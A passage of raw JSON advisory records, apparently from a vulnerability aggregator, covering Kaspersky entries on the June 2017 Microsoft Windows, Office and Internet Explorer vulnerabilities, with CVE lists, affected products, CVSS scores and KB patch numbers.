\n[CVE-2017-8477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8477>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8462>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8482>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8490>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8481>) \n[CVE-2017-8468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8468>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8469>) \n[CVE-2017-8474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8474>) \n[CVE-2017-8465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8465>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0297>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *CVE-IDS*:\n[CVE-2017-8479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8479>)0.0Unknown \n[CVE-2017-0299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0299>)0.0Unknown \n[CVE-2017-8485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8485>)0.0Unknown \n[CVE-2017-8478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8478>)0.0Unknown \n[CVE-2017-8476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8476>)0.0Unknown \n[CVE-2017-8494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8494>)0.0Unknown 
\n[CVE-2017-8480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8480>)0.0Unknown \n[CVE-2017-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8489>)0.0Unknown \n[CVE-2017-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300>)0.0Unknown \n[CVE-2017-8491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8491>)0.0Unknown \n[CVE-2017-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8477>)0.0Unknown \n[CVE-2017-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8462>)0.0Unknown \n[CVE-2017-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8482>)0.0Unknown \n[CVE-2017-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8492>)0.0Unknown \n[CVE-2017-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8490>)0.0Unknown \n[CVE-2017-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8484>)0.0Unknown \n[CVE-2017-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8481>)0.0Unknown \n[CVE-2017-8468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8468>)0.0Unknown \n[CVE-2017-8469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8469>)0.0Unknown \n[CVE-2017-8474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8474>)0.0Unknown \n[CVE-2017-8465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8465>)0.0Unknown \n[CVE-2017-0297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0297>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4022726](<http://support.microsoft.com/kb/4022726>) \n[4022714](<http://support.microsoft.com/kb/4022714>) \n[4022724](<http://support.microsoft.com/kb/4022724>) \n[4022727](<http://support.microsoft.com/kb/4022727>) \n[4022715](<http://support.microsoft.com/kb/4022715>) \n[4022725](<http://support.microsoft.com/kb/4022725>) \n[4022722](<http://support.microsoft.com/kb/4022722>) 
\n[4022717](<http://support.microsoft.com/kb/4022717>) \n[4022718](<http://support.microsoft.com/kb/4022718>) \n[4022013](<http://support.microsoft.com/kb/4022013>) \n[4022887](<http://support.microsoft.com/kb/4022887>) \n[4034741](<http://support.microsoft.com/kb/4034741>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 50, "modified": "2020-06-18T00:00:00", "published": "2017-06-13T00:00:00", "id": "KLA11048", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11048", "title": "KLA11048 Multiple vulnerabilities in Windows Kernel", "type": "kaspersky", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:57:43", "bulletinFamily": "info", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nMicrosoft Silverlight 5 when installed on Microsoft Windows (x64-based) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Lync 2010 (32-bit) \nMicrosoft Lync 2013 Service Pack 1 (32-bit) \nSkype for Business 2016 (64-bit) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nInternet Explorer 11 \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft Lync 2013 Service Pack 1 (64-bit) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nMicrosoft Office 2016 Click-to-Run (C2R) for 32-bit editions \nWindows Server 2016 \nMicrosoft Lync 2010 Attendee (admin level install) \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nSkype for Business 2016 (32-bit) \nMicrosoft Lync 2010 Attendee (user level install) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Lync 2010 (64-bit) \nMicrosoft Office Word Viewer \nMicrosoft Live Meeting 2007 Console \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (32-bit) \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server 
Core installation) \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (x64-based) \nMicrosoft Office 2007 Service Pack 3 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nWindows 10 Version 1607 for 32-bit Systems \nMicrosoft Office 2016 Click-to-Run (C2R) for 64-bit editions \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nMicrosoft Silverlight 5 when installed on Microsoft Windows (32-bit) \nWindows Server 2012 R2 \nMicrosoft Live Meeting 2007 Add-in\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8485](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8485>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8481>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8480>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8469>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8482>) \n[CVE-2017-8464](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8464>) \n[CVE-2017-8544](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8544>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8462>) 
\n[CVE-2017-0289](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0289>) \n[CVE-2017-0288](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0288>) \n[CVE-2017-8528](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8528>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8529>) \n[CVE-2017-0283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0283>) \n[CVE-2017-0282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0282>) \n[CVE-2017-0287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0287>) \n[CVE-2017-0286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0286>) \n[CVE-2017-0285](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0285>) \n[CVE-2017-0284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0284>) \n[CVE-2017-8483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8483>) \n[CVE-2017-8517](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8517>) \n[CVE-2017-0193](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0193>) \n[CVE-2017-8471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8471>) \n[CVE-2017-0298](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0298>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8478>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8479>) \n[CVE-2017-8543](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8543>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8492>) 
\n[CVE-2017-8490](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8490>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8491>) \n[CVE-2017-8470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8470>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8489>) \n[CVE-2017-8472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8472>) \n[CVE-2017-8473](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8473>) \n[CVE-2017-8553](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8553>) \n[CVE-2017-8475](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8475>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8476>) \n[CVE-2017-8488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8488>) \n[CVE-2017-0294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0294>) \n[CVE-2017-0296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0296>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0297>) \n[CVE-2017-8534](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8534>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8477>) \n[CVE-2017-8531](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8531>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0299>) \n[CVE-2017-8533](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8533>) \n[CVE-2017-8532](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8532>) 
\n[CVE-2017-8527](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8527>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8519>) \n[CVE-2017-0260](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0260>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0300>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8543>)0.0Unknown \n[CVE-2017-0284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0284>)0.0Unknown \n[CVE-2017-8479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8479>)0.0Unknown \n[CVE-2017-0299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0299>)0.0Unknown \n[CVE-2017-8485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8485>)0.0Unknown \n[CVE-2017-0193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0193>)0.0Unknown \n[CVE-2017-8478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8478>)0.0Unknown \n[CVE-2017-8488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8488>)0.0Unknown \n[CVE-2017-8528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8528>)0.0Unknown \n[CVE-2017-8475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8475>)0.0Unknown \n[CVE-2017-8476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8476>)0.0Unknown \n[CVE-2017-8470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8470>)0.0Unknown \n[CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)0.0Unknown \n[CVE-2017-8480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8480>)0.0Unknown \n[CVE-2017-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8489>)0.0Unknown 
\n[CVE-2017-0285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0285>)0.0Unknown \n[CVE-2017-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300>)0.0Unknown \n[CVE-2017-8534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8534>)0.0Unknown \n[CVE-2017-8491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8491>)0.0Unknown \n[CVE-2017-8471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8471>)0.0Unknown \n[CVE-2017-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8477>)0.0Unknown \n[CVE-2017-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8462>)0.0Unknown \n[CVE-2017-0294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0294>)0.0Unknown \n[CVE-2017-8472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8472>)0.0Unknown \n[CVE-2017-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8482>)0.0Unknown \n[CVE-2017-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8492>)0.0Unknown \n[CVE-2017-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8490>)0.0Unknown \n[CVE-2017-8483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8483>)0.0Unknown \n[CVE-2017-0283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0283>)0.0Unknown \n[CVE-2017-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8484>)0.0Unknown \n[CVE-2017-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8481>)0.0Unknown \n[CVE-2017-0282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0282>)0.0Unknown \n[CVE-2017-0260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0260>)0.0Unknown \n[CVE-2017-8469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8469>)0.0Unknown \n[CVE-2017-0297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0297>)0.0Unknown \n[CVE-2017-0296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0296>)0.0Unknown 
\n[CVE-2017-8473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8473>)0.0Unknown \n[CVE-2017-8517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8517>)0.0Unknown \n[CVE-2017-8519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8519>)0.0Unknown \n[CVE-2017-8529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8529>)0.0Unknown \n[CVE-2017-0286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0286>)0.0Unknown \n[CVE-2017-0287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0287>)0.0Unknown \n[CVE-2017-0288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0288>)0.0Unknown \n[CVE-2017-0289](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0289>)0.0Unknown \n[CVE-2017-8527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8527>)0.0Unknown \n[CVE-2017-8531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8531>)0.0Unknown \n[CVE-2017-8532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8532>)0.0Unknown \n[CVE-2017-8533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8533>)0.0Unknown \n[CVE-2017-0298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0298>)0.0Unknown \n[CVE-2017-8544](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8544>)0.0Unknown \n[CVE-2017-8553](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8553>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4021558](<http://support.microsoft.com/kb/4021558>) \n[4022722](<http://support.microsoft.com/kb/4022722>) \n[4024402](<http://support.microsoft.com/kb/4024402>) \n[4022008](<http://support.microsoft.com/kb/4022008>) \n[4021903](<http://support.microsoft.com/kb/4021903>) \n[4021923](<http://support.microsoft.com/kb/4021923>) \n[4022013](<http://support.microsoft.com/kb/4022013>) \n[4022010](<http://support.microsoft.com/kb/4022010>) \n[4018106](<http://support.microsoft.com/kb/4018106>) 
\n[4022887](<http://support.microsoft.com/kb/4022887>) \n[4022884](<http://support.microsoft.com/kb/4022884>) \n[4022883](<http://support.microsoft.com/kb/4022883>) \n[3217845](<http://support.microsoft.com/kb/3217845>) \n[4034679](<http://support.microsoft.com/kb/4034679>) \n[4034664](<http://support.microsoft.com/kb/4034664>) \n[4034741](<http://support.microsoft.com/kb/4034741>) \n[4036586](<http://support.microsoft.com/kb/4036586>) \n[4503292](<http://support.microsoft.com/kb/4503292>) \n[4503269](<http://support.microsoft.com/kb/4503269>)", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2017-06-13T00:00:00", "id": "KLA11842", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11842", "title": "\r KLA11842Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:43:42", "bulletinFamily": "info", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8484", "CVE-2017-8527", "CVE-2017-0296"], "description": "### *Detect date*:\n06/13/2019\n\n### *Severity*:\nCritical\n\n### 
*Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, obtain sensitive information, gain privileges.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8543](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8543>) \n[CVE-2017-0219](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0219>) 
\n[CVE-2017-0284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0284>) \n[CVE-2017-0218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0218>) \n[CVE-2017-0215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0215>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8479>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0299>) \n[CVE-2017-8485](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8485>) \n[CVE-2017-0193](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0193>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8478>) \n[CVE-2017-8488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8488>) \n[CVE-2017-8528](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8528>) \n[CVE-2017-8460](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8460>) \n[CVE-2017-8475](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8475>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8476>) \n[CVE-2017-8470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8470>) \n[CVE-2017-8494](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8494>) \n[CVE-2017-8466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8466>) \n[CVE-2017-8464](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8464>) \n[CVE-2017-0291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0291>) \n[CVE-2017-0216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0216>) 
\n[CVE-2017-0292](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0292>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8480>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8489>) \n[CVE-2017-0285](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0285>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0300>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8491>) \n[CVE-2017-8471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8471>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8477>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8462>) \n[CVE-2017-0173](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0173>) \n[CVE-2017-0294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0294>) \n[CVE-2017-8472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8472>) 